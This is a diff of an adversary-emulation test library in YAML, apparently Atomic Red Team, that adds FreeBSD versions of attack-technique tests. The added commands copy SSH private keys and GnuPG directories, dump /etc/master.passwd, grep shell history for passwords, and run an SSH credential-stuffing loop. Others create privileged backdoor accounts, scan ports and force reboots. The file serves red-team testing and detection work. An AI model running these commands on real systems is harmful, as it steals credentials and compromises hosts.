- description: 'Install GNU cp from coreutils package.
'
prereq_command: 'if [ ! -x "$(command -v gcp)" ]; then exit 1; else exit 0;
fi;
'
get_prereq_command: "(which pkg && pkg install -y coreutils)\n"
executor:
command: |
mkdir #{output_folder}
find #{search_path} -name id_rsa 2>/dev/null -exec gcp --parents {} #{output_folder} \;
cleanup_command: 'rm -rf #{output_folder}
'
name: sh
- name: Copy Private SSH Keys with rsync
@@ -60143,6 +62270,41 @@ credential-access:
exit 0
cleanup_command: 'rm -rf #{output_folder}
'
name: sh
- name: Copy Private SSH Keys with rsync (freebsd)
auto_generated_guid: 922b1080-0b95-42b0-9585-b9a5ea0af044
description: 'Copy private SSH keys on a FreeBSD system to a staging folder
using the `rsync` command.
'
supported_platforms:
- linux
input_arguments:
search_path:
description: Path where to start searching from.
type: path
default: "/"
output_folder:
description: Output folder containing copies of SSH private key files
type: path
default: "/tmp/art-staging"
dependency_executor_name: sh
dependencies:
- description: 'Check if rsync is installed.
'
prereq_command: 'if [ ! -x "$(command -v rsync)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y rsync)\n"
executor:
command: |
mkdir #{output_folder}
find #{search_path} -name id_rsa 2>/dev/null -exec rsync -R {} #{output_folder} \;
cleanup_command: 'rm -rf #{output_folder}
'
name: sh
- name: Copy the users GnuPG directory with rsync
@@ -60170,6 +62332,41 @@ credential-access:
exit 0
cleanup_command: 'rm -rf #{output_folder}
'
name: sh
- name: Copy the users GnuPG directory with rsync (freebsd)
auto_generated_guid: b05ac39b-515f-48e9-88e9-2f141b5bcad0
description: 'Copy the users GnuPG (.gnupg) directory on a FreeBSD system to
a staging folder using the `rsync` command.
'
supported_platforms:
- linux
input_arguments:
search_path:
description: Path where to start searching from
type: path
default: "/"
output_folder:
description: Output folder containing a copy of the .gnupg directory
type: path
default: "/tmp/GnuPG"
dependency_executor_name: sh
dependencies:
- description: 'Check if rsync is installed.
'
prereq_command: 'if [ ! -x "$(command -v rsync)" ]; then exit 1; else exit
0; fi;
'
get_prereq_command: "(which pkg && pkg install -y rsync)\n"
executor:
command: |
mkdir #{output_folder}
find #{search_path} -type d -name '.gnupg' 2>/dev/null -exec rsync -Rr {} #{output_folder} \;
cleanup_command: 'rm -rf #{output_folder}
'
name: sh
T1557.001:
@@ -60929,6 +63126,32 @@ credential-access:
command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} >
#{output_file}
'
name: sh
- name: Search Through sh History
auto_generated_guid: d87d3b94-05b4-40f2-a80f-99864ffa6803
description: 'Search through sh history for specifice commands we want to capture
'
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: path
default: "~/loot.txt"
sh_history_grep_args:
description: grep arguments that filter out specific commands we want to
capture
type: path
default: "-e '-p ' -e 'pass' -e 'ssh'"
sh_history_filename:
description: Path of the sh history file to capture
type: path
default: "~/.history"
executor:
command: 'cat #{sh_history_filename} | grep #{sh_history_grep_args} > #{output_file}
'
name: sh
T1552.001:
@@ -61017,7 +63240,6 @@ credential-access:
'
supported_platforms:
- freebsd
- macos
- linux
input_arguments:
@@ -61036,9 +63258,8 @@ credential-access:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
file_path:
description: Path to search
@@ -61056,9 +63277,8 @@ credential-access:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
file_path:
description: Path to search
@@ -62006,6 +64226,37 @@ credential-access:
command: |
cp "$PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt" /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
- name: SSH Credential Stuffing From FreeBSD
auto_generated_guid: a790d50e-7ebf-48de-8daa-d9367e0911d4
description: 'Using username,password combination from a password dump to login
over SSH.
'
supported_platforms:
- linux
input_arguments:
target_host:
description: IP Address / Hostname you want to target.
type: string
default: localhost
dependency_executor_name: sh
dependencies:
- description: 'Requires SSHPASS
'
prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'pkg install -y sshpass
'
executor:
name: sh
elevation_required: false
command: |
cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/
for unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d":" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d":" -f1`@#{target_host};done
T1208:
technique:
x_mitre_platforms:
@@ -62559,11 +64810,29 @@ credential-access:
'
name: bash
elevation_required: true
- name: Access /etc/master.passwd (Local)
auto_generated_guid: 5076874f-a8e6-4077-8ace-9e5ab54114a5
description: "/etc/master.passwd file is accessed in FreeBSD environments\n"
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: path
default: "/tmp/T1003.008.txt"
executor:
command: |
sudo cat /etc/master.passwd > #{output_file}
cat #{output_file}
cleanup_command: 'rm -f #{output_file}
'
name: sh
elevation_required: true
- name: Access /etc/passwd (Local)
auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d
description: "/etc/passwd file is accessed in FreeBSD and Linux environments\n"
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
@@ -62585,7 +64854,6 @@ credential-access:
'
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
@@ -62609,7 +64877,6 @@ credential-access:
'
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
@@ -63692,7 +65959,6 @@ discovery:
Upon successful execution, sh will stdout list of usernames.
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -64280,7 +66546,6 @@ discovery:
'
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
@@ -64299,7 +66564,6 @@ discovery:
auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2
description: "(requires root)\n"
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -64323,7 +66587,6 @@ discovery:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -64346,7 +66609,6 @@ discovery:
'
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -64395,6 +66657,26 @@ discovery:
cat #{output_file}
cleanup_command: 'rm -f #{output_file}
'
name: sh
- name: Show if a user account has ever logged in remotely (freebsd)
auto_generated_guid: 0f73418f-d680-4383-8a24-87bc97fe4e35
description: 'Show if a user account has ever logged in remotely
'
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
type: path
default: "/tmp/T1087.001.txt"
executor:
command: |
lastlogin > #{output_file}
cat #{output_file}
cleanup_command: 'rm -f #{output_file}
'
name: sh
- name: Enumerate users and groups
@@ -64403,7 +66685,6 @@ discovery:
'
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -64517,6 +66798,20 @@ discovery:
command: |
if (systemd-detect-virt) then echo "Virtualization Environment detected"; fi;
if (sudo dmidecode | egrep -i 'manufacturer|product|vendor' | grep -iE 'Oracle|VirtualBox|VMWare|Parallels') then echo "Virtualization Environment detected"; fi;
- name: Detect Virtualization Environment (FreeBSD)
auto_generated_guid: e129d73b-3e03-4ae9-bf1e-67fc8921e0fd
description: |
Detects execution in a virtualized environment.
At boot, dmesg stores a log if a hypervisor is detected.
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: 'if [ "$(sysctl -n hw.hv_vendor)" != "" ]; then echo "Virtualization
Environment detected"; fi
'
T1069.002:
technique:
modified: '2023-04-07T17:16:47.754Z'
@@ -64665,6 +66960,18 @@ discovery:
'
name: bash
- name: System Service Discovery - service
auto_generated_guid: b2e1c734-7336-40f9-b970-b04731cbaf8a
description: 'Enumerates system service using service
'
supported_platforms:
- linux
executor:
command: 'service -e
'
name: sh
T1040:
technique:
modified: '2023-04-12T23:31:49.085Z'
@@ -64782,6 +67089,117 @@ discovery:
tshark -c 5 -i #{interface}
name: bash
elevation_required: true
- name: Packet Capture FreeBSD using tshark or tcpdump
auto_generated_guid: c93f2492-9ebe-44b5-8b45-36574cccfe67
description: |
Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed.
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
supported_platforms:
- linux
input_arguments:
interface:
description: Specify interface to perform PCAP on.
type: string
default: em0
dependency_executor_name: sh
dependencies:
- description: 'Check if at least one of tcpdump or tshark is installed.
'
prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command
-v tshark)" ]; then exit 1; else exit 0; fi;
'
get_prereq_command: "(which pkg && pkg install -y wireshark-nox11)\n"
executor:
command: |
tcpdump -c 5 -nnni #{interface}
tshark -c 5 -i #{interface}
name: sh
elevation_required: true
- name: Packet Capture FreeBSD using /dev/bpfN with sudo
auto_generated_guid: e2028771-1bfb-48f5-b5e6-e50ee0942a14
description: 'Opens a /dev/bpf file (O_RDONLY) and captures packets for a few
seconds.
'
supported_platforms:
- linux
input_arguments:
ifname:
description: Specify interface to perform PCAP on.
type: string
default: em0
csource_path:
description: Path to C program source
type: string
default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c
program_path:
description: Path to compiled C program
type: string
default: "/tmp/t1040_freebsd_pcapdemo"
dependency_executor_name: sh
dependencies:
- description: 'compile C program
'
prereq_command: 'exit 1
'
get_prereq_command: 'cc #{csource_path} -o #{program_path}
'
executor:
command: 'sudo #{program_path} -i #{ifname} -t 3
'
cleanup_command: 'rm -f #{program_path}
'
name: sh
elevation_required: true
- name: Filtered Packet Capture FreeBSD using /dev/bpfN with sudo
auto_generated_guid: a3a0d4c9-c068-4563-a08d-583bd05b884c
description: 'Opens a /dev/bpf file (O_RDONLY), sets BPF filter for ''udp''
and captures packets for a few seconds.
'
supported_platforms:
- linux
input_arguments:
ifname:
description: Specify interface to perform PCAP on.
type: string
default: em0
csource_path:
description: Path to C program source
type: string
default: PathToAtomicsFolder/T1040/src/freebsd_pcapdemo.c
program_path:
description: Path to compiled C program
type: string
default: "/tmp/t1040_freebsd_pcapdemo"
dependency_executor_name: sh
dependencies:
- description: 'compile C program
'
prereq_command: 'exit 1
'
get_prereq_command: 'cc #{csource_path} -o #{program_path}
'
executor:
command: 'sudo #{program_path} -f -i #{ifname} -t 3
'
cleanup_command: 'rm -f #{program_path}
'
name: sh
elevation_required: true
- name: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo
auto_generated_guid: 10c710c9-9104-4d5f-8829-5b65391e2a29
description: 'Captures packets with domain=AF_PACKET, type=SOCK_RAW for a few
@@ -65023,6 +67441,38 @@ discovery:
'
name: bash
elevation_required: true
- name: Network Share Discovery - FreeBSD
auto_generated_guid: 77e468a6-3e5c-45a1-9948-c4b5603747cb
description: 'Network Share Discovery using smbstatus
'
supported_platforms:
- linux
input_arguments:
package_checker:
description: Package checking command. pkg info -x samba
type: string
default: "(pkg info -x samba &>/dev/null)"
package_installer:
description: Package installer command. pkg install -y samba413
type: string
default: "(which pkg && pkg install -y samba413)"
dependency_executor_name: sh
dependencies:
- description: 'Package with smbstatus (samba) must exist on device
'
prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit
1; fi
'
get_prereq_command: "#{package_installer} \n"
executor:
command: 'smbstatus --shares
'
name: sh
elevation_required: true
T1120:
technique:
modified: '2023-03-30T21:01:41.575Z'
@@ -65162,7 +67612,6 @@ discovery:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -65217,13 +67666,24 @@ discovery:
sudo lsmod | grep -i "virtio_pci\|virtio_net"
sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
name: bash
- name: FreeBSD VM Check via Kernel Modules
auto_generated_guid: eefe6a49-d88b-41d8-8fc2-b46822da90d3
description: 'Identify virtual machine host kernel modules.
'
supported_platforms:
- linux
executor:
command: |
kldstat | grep -i "vmm"
kldstat | grep -i "vbox"
name: sh
- name: Hostname Discovery
auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133
description: 'Identify system hostname for FreeBSD, Linux and macOS systems.
'
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -65238,9 +67698,8 @@ discovery:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
command: 'env
@@ -65261,6 +67720,20 @@ discovery:
kmod list
grep vmw /proc/modules
name: sh
- name: FreeBSD List Kernel Modules
auto_generated_guid: 4947897f-643a-4b75-b3f5-bed6885749f6
description: 'Enumerate kernel modules loaded. Upon successful execution stdout
will display kernel modules loaded, followed by list of modules matching ''vmm''
if present.
'
supported_platforms:
- linux
executor:
command: |
kldstat
kldstat | grep vmm
name: sh
T1010:
technique:
modified: '2023-04-15T16:46:04.776Z'
@@ -65679,7 +68152,6 @@ discovery:
'
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
@@ -65692,6 +68164,28 @@ discovery:
cat #{output_file} 2>/dev/null
cleanup_command: 'rm -f #{output_file} 2>/dev/null
'
name: sh
- name: List Google Chromium Bookmark JSON Files on FreeBSD
auto_generated_guid: 88ca025b-3040-44eb-9168-bd8af22b82fa
description: 'Searches for Google Chromium''s Bookmark file (on FreeBSD) that
contains bookmarks in JSON format and lists any found instances to a text
file.
'
supported_platforms:
- linux
input_arguments:
output_file:
description: Path where captured results will be placed.
type: path
default: "/tmp/T1217-Chrome.txt"
executor:
command: |
find / -path "*/.config/chromium/*/Bookmarks" -exec echo {} >> #{output_file} \;
cat #{output_file} 2>/dev/null
cleanup_command: 'rm -f #{output_file} 2>/dev/null
'
name: sh
T1016:
@@ -65788,6 +68282,20 @@ discovery:
if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is missing from the machine. skipping..."; fi;
if [ -x "$(command -v netstat)" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
name: sh
- name: System Network Configuration Discovery (freebsd)
auto_generated_guid: 7625b978-4efd-47de-8744-add270374bee
description: |
Identify network configuration information.
Upon successful execution, sh will spawn multiple commands and output will be via stdout.
supported_platforms:
- linux
executor:
command: |
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi;
if [ -x "$(command -v netstat)" ]; then netstat -Sp tcp | awk '{print $NF}' | grep -v '[[:lower:]]' | sort | uniq -c; else echo "netstat is missing from the machine. skipping..."; fi;
name: sh
T1087:
technique:
modified: '2023-04-15T17:24:23.029Z'
@@ -66006,9 +68514,8 @@ discovery:
https://perishablepress.com/list-files-folders-recursively-terminal/
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
output_file:
description: Output file used to store the results.
@@ -66034,9 +68541,8 @@ discovery:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
output_file:
description: Output file used to store the results.
@@ -66139,7 +68645,6 @@ discovery:
Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
supported_platforms:
- freebsd
- linux
- macos
dependency_executor_name: sh
@@ -66423,7 +68928,6 @@ discovery:
Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -66575,9 +69079,8 @@ discovery:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
command: |
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
@@ -66670,6 +69173,18 @@ discovery:
'
name: bash
- name: Examine password complexity policy - FreeBSD
auto_generated_guid: a7893624-a3d7-4aed-9676-80498f31820f
description: 'Lists the password complexity policy to console on FreeBSD.
'
supported_platforms:
- linux
executor:
command: 'cat /etc/pam.d/passwd
'
name: sh
- name: Examine password complexity policy - CentOS/RHEL 7.x
auto_generated_guid: 78a12e65-efff-4617-bc01-88f17d71315d
description: 'Lists the password complexity policy to console on CentOS/RHEL
@@ -66819,7 +69334,6 @@ discovery:
Upon successful execution, the output will contain the environment variables that indicate
the 5 character locale that can be looked up to correlate the language and territory.
supported_platforms:
- freebsd
- linux
executor:
command: 'locale
@@ -66877,7 +69391,6 @@ discovery:
also used as a builtin command that does not generate syscall telemetry but
does provide a list of the environment variables.
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
@@ -67092,6 +69605,18 @@ discovery:
executor:
command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd''
'
name: sh
- name: Security Software Discovery - pgrep (FreeBSD)
auto_generated_guid: fa96c21c-5fd6-4428-aa28-51a2fbecdbdc
description: |
Methods to identify Security Software on an endpoint
when sucessfully executed, command shell is going to display AV/Security software it is running.
supported_platforms:
- linux
executor:
command: 'pgrep -l ''bareos-fd|icinga2|cbagentd|wazuh-agent|packetbeat|filebeat|osqueryd''
'
name: sh
T1526:
@@ -67242,7 +69767,6 @@ discovery:
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
supported_platforms:
- freebsd
- linux
- macos
dependency_executor_name: sh
@@ -67268,7 +69792,6 @@ discovery:
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -67332,6 +69855,18 @@ discovery:
executor:
command: 'ip route show
'
name: sh
- name: Remote System Discovery - netstat
auto_generated_guid: d2791d72-b67f-4615-814f-ec824a91f514
description: 'Use the netstat command to display the kernels routing tables.
'
supported_platforms:
- linux
executor:
command: 'netstat -r | grep default
'
name: sh
- name: Remote System Discovery - ip tcp_metrics
@@ -67504,6 +70039,44 @@ discovery:
nc -nv #{host} #{port}
name: sh
elevation_required: true
- name: Port Scan Nmap for FreeBSD
auto_generated_guid: f03d59dc-0e3b-428a-baeb-3499552c7048
description: |
Scan ports to check for listening ports with Nmap.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
supported_platforms:
- linux
input_arguments:
host:
description: Host to scan.
type: string
default: 192.168.1.1
port:
description: Ports to scan.
type: string
default: '80'
network_range:
description: Network Range to Scan.
type: string
default: 192.168.1.0/24
dependency_executor_name: sh
dependencies:
- description: 'Check if nmap command exists on the machine
'
prereq_command: 'if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1;
fi;
'
get_prereq_command: "(which pkg && pkg install -y nmap)\n"
executor:
command: |
nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
name: sh
elevation_required: true
T1518:
technique:
modified: '2023-03-30T21:01:50.920Z'
@@ -67747,7 +70320,19 @@ discovery:
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1124
atomic_tests: []
atomic_tests:
- name: System Time Discovery in FreeBSD/macOS
auto_generated_guid: f449c933-0891-407f-821e-7916a21a1a6f
description: "Identify system time. Upon execution, the local computer system
time and timezone will be displayed. \n"
supported_platforms:
- linux
- macos
executor:
command: 'date
'
name: sh
resource-development:
T1583:
technique:
@@ -73810,7 +76395,6 @@ impact:
'
supported_platforms:
- freebsd
- linux
input_arguments:
pwd_for_encrypted_file:
@@ -73856,7 +76440,6 @@ impact:
'
supported_platforms:
- freebsd
- linux
input_arguments:
pwd_for_encrypted_file:
@@ -73895,7 +76478,6 @@ impact:
'
supported_platforms:
- freebsd
- linux
input_arguments:
cped_file_path:
@@ -73946,7 +76528,6 @@ impact:
'
supported_platforms:
- freebsd
- linux
input_arguments:
private_key_path:
@@ -74364,9 +76945,8 @@ impact:
This test simulates a high CPU load as you might observe during cryptojacking attacks.
End the test by using CTRL/CMD+C to break.
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
command: 'yes > /dev/null
@@ -74529,7 +77109,6 @@ impact:
Overwrites and deletes a file using DD.
To stop the test, break the command with CTRL/CMD+C.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -74928,9 +77507,8 @@ impact:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
timeout:
description: Time to restart (can be minutes or specific time)
@@ -74948,9 +77526,8 @@ impact:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
timeout:
description: Time to shutdown (can be minutes or specific time)
@@ -74968,9 +77545,8 @@ impact:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
command: 'reboot
@@ -74983,7 +77559,6 @@ impact:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'halt -p
@@ -74991,6 +77566,19 @@ impact:
'
name: sh
elevation_required: true
- name: Reboot System via `halt` - FreeBSD
auto_generated_guid: 7b1cee42-320f-4890-b056-d65c8b884ba5
description: 'This test restarts a FreeBSD system using `halt`.
'
supported_platforms:
- linux
executor:
command: 'halt -r
'
name: sh
elevation_required: true
- name: Reboot System via `halt` - Linux
auto_generated_guid: 78f92e14-f1e9-4446-b3e9-f1b921f2459e
description: 'This test restarts a Linux system using `halt`.
@@ -75010,7 +77598,6 @@ impact:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'poweroff
@@ -75018,6 +77605,19 @@ impact:
'
name: sh
elevation_required: true
- name: Reboot System via `poweroff` - FreeBSD
auto_generated_guid: 5a282e50-86ff-438d-8cef-8ae01c9e62e1
description: 'This test restarts a FreeBSD system using `poweroff`.
'
supported_platforms:
- linux
executor:
command: 'poweroff -r 3
'
name: sh
elevation_required: true
- name: Reboot System via `poweroff` - Linux
auto_generated_guid: 61303105-ff60-427b-999e-efb90b314e41
description: 'This test restarts a Linux system using `poweroff`.
@@ -76619,6 +79219,23 @@ initial-access:
whoami
exit
cleanup_command: "userdel -r art \n"
- name: Create local account (FreeBSD)
auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0
description: 'An adversary may wish to create an account with admin privileges
to work with. In this test we create a "art" user with the password art, switch
to art, execute whoami, exit and delete the art user.
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art)
| pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n"
cleanup_command: 'rmuser -y art
'
- name: Reactivate a locked/expired account (Linux)
auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931
description: "A system administrator may have locked and expired a user account
@@ -76642,6 +79259,30 @@ initial-access:
whoami
exit
cleanup_command: "userdel -r art \n"
- name: Reactivate a locked/expired account (FreeBSD)
auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf'
description: "A system administrator may have locked and expired a user account
rather than deleting it. \"the user is coming back, at some stage\" An adversary
may reactivate a inactive account in an attempt to appear legitimate. \n\nIn
this test we create a \"art\" user with the password art, lock and expire
the account, try to su to art and fail, unlock and renew the account, su successfully,
then delete the account.\n"
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: |
pw useradd art -g wheel -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
pw lock art
pw usermod art -e +1d
pw unlock art
pw user mod art -e +99d
su art
whoami
exit
cleanup_command: "rmuser -y art \n"
- name: Login as nobody (Linux)
auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85
description: 'An adversary may try to re-purpose a system account to appear
@@ -76660,6 +79301,26 @@ initial-access:
nobody\nsu nobody\nwhoami\nexit\n"
cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep
nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n"
- name: Login as nobody (freebsd)
auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310
description: 'An adversary may try to re-purpose a system account to appear
legitimate. In this test change the login shell of the nobody account, change
its password to nobody, su to nobody, exit, then reset nobody''s shell to
/usr/sbin/nologin.
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: true
command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged
user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho
$(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n"
cleanup_command: |
pw usermod nobody -s /usr/sbin/nologin
cat /etc/passwd |grep nobody
# -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
exfiltration:
T1567:
technique:
@@ -77126,7 +79787,6 @@ exfiltration:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
input_file:
description: Test file to upload
@@ -77283,7 +79943,6 @@ exfiltration:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
domain:
description: target SSH domain
@@ -77305,7 +79964,6 @@ exfiltration:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
user_name:
description: username for domain
@@ -77565,7 +80223,6 @@ exfiltration:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
file_name:
description: File name
@@ -77849,7 +80506,6 @@ exfiltration:
supported_platforms:
- macos
- linux
- freebsd
executor:
steps: |
1. Victim System Configuration:
@@ -77872,7 +80528,6 @@ exfiltration:
'
supported_platforms:
- freebsd
- linux
executor:
steps: "1. On the adversary machine run the below command.\n\n tshark -f
@@ -77900,4 +80555,21 @@ exfiltration:
command: 'if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090
& PID=$!; sleep 10; kill $PID; unset PID; fi
'
- name: Python3 http.server (freebsd)
auto_generated_guid: 57a303a2-0bc6-400d-b144-4f3292920a0b
description: 'An adversary may use the python3 standard library module http.server
to exfiltrate data. This test checks if python3.9 is available and if so,
creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds,
then kills the PID and unsets the $PID variable.
'
supported_platforms:
- linux
executor:
name: sh
elevation_required: false
command: 'if [ $(which python3.9) ]; then cd /tmp; python3.9 -m http.server
9090 & PID=$!; sleep 10; kill $PID; unset PID; fi
'
+25 -97
View File
@@ -829,9 +829,8 @@ defense-evasion:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
numeric_mode:
description: Specified numeric mode value
@@ -853,9 +852,8 @@ defense-evasion:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
symbolic_mode:
description: Specified symbolic mode value
@@ -877,9 +875,8 @@ defense-evasion:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
numeric_mode:
description: Specified numeric mode value
@@ -901,9 +898,8 @@ defense-evasion:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
symbolic_mode:
description: Specified symbolic mode value
@@ -978,9 +974,8 @@ defense-evasion:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
owner:
description: Username of desired owner
@@ -2329,7 +2324,6 @@ defense-evasion:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
test_message:
description: Test message to echo out to the screen
@@ -4480,7 +4474,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -4518,7 +4511,6 @@ defense-evasion:
description: "Use Perl to decode a base64-encoded text string and echo it to
the console \n"
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -4586,7 +4578,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -5449,7 +5440,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -5481,7 +5471,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -5516,7 +5505,6 @@ defense-evasion:
Setting the creation timestamp requires changing the system clock and reverting.
Sudo or root privileges are required to change date. Use with caution.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -5543,7 +5531,6 @@ defense-evasion:
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -7190,9 +7177,8 @@ defense-evasion:
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
file_to_pad:
description: Path of binary to be padded
@@ -7225,9 +7211,8 @@ defense-evasion:
Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
file_to_pad:
description: Path of binary to be padded
@@ -13976,7 +13961,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -14008,7 +13992,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -14039,7 +14022,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -15686,7 +15668,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -15724,7 +15705,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -17093,7 +17073,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -20447,9 +20426,8 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
command:
description: Command to execute
@@ -29881,9 +29859,8 @@ execution:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
command:
description: Command to execute
@@ -32038,7 +32015,6 @@ execution:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -32063,7 +32039,6 @@ execution:
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -35452,9 +35427,8 @@ persistence:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
command:
description: Command to execute
@@ -36503,7 +36477,6 @@ persistence:
